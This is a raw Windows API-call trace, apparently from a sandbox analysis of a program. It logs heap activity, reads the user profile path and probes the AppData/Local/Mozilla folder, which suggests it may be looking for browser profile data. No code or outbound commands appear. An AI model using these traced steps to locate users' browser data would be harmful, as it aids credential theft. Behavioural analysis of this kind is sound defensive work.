0x34aa5b0 [0248.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0248.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0248.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0248.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0248.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0248.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0248.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0248.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0248.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0248.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0248.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0248.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0248.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0248.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0248.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0248.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0248.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0248.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mozilla", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0248.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozilla", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0248.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0248.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0248.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0248.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0248.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0248.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0248.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0248.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0248.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0248.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0248.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0248.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0248.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0248.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0248.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0248.219] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0248.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0248.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0248.219] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0248.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0248.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0248.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0248.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0248.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0248.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0248.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0248.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0248.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0248.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0248.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0248.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0248.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0248.220] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0248.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0248.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0248.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0248.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0248.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0248.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0248.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0248.221] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0248.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0248.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0248.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0248.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0248.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0248.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0248.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0248.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0248.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0248.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0248.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0248.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0248.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0248.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0248.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0248.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0248.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0248.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0248.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0248.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0248.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0248.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0248.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0248.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0248.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0248.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0248.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0248.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0248.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0248.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0248.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0248.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0248.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0248.223] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0248.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0248.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0248.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8f8 [0248.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0248.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0248.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0248.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0248.223] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0248.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0248.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0248.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0248.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0248.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0248.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0248.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0248.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0248.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0248.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0248.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0248.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0248.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0248.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0248.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x249c7b0 [0248.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0248.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0248.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0248.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0248.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0248.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0248.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0248.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0248.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0248.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0248.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0248.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0248.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0248.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0248.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0248.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0248.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0248.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0248.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0248.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0248.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0248.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0248.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0248.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0248.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0248.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0248.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0248.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0248.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0248.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0248.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0248.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0248.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0248.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0248.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0248.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0248.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0248.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0248.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0248.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0248.226] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0248.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0248.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0248.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0248.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0248.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0248.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0248.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0248.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0248.227] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0248.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0248.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0248.230] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.230] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0248.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0248.230] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0248.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0248.230] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0248.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0248.230] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0248.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0248.230] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Mozilla", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x14052f, dwReserved1=0xa235, cFileName="Mozilla", cAlternateFileName="")) returned 0xaa5760 [0248.231] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0248.231] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0248.231] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0248.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0248.231] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0248.231] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0248.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0248.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0248.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0248.232] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0248.232] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.232] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0248.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0248.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0248.232] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0248.232] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0248.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0248.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0248.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0248.232] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0248.232] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0248.233] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0248.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 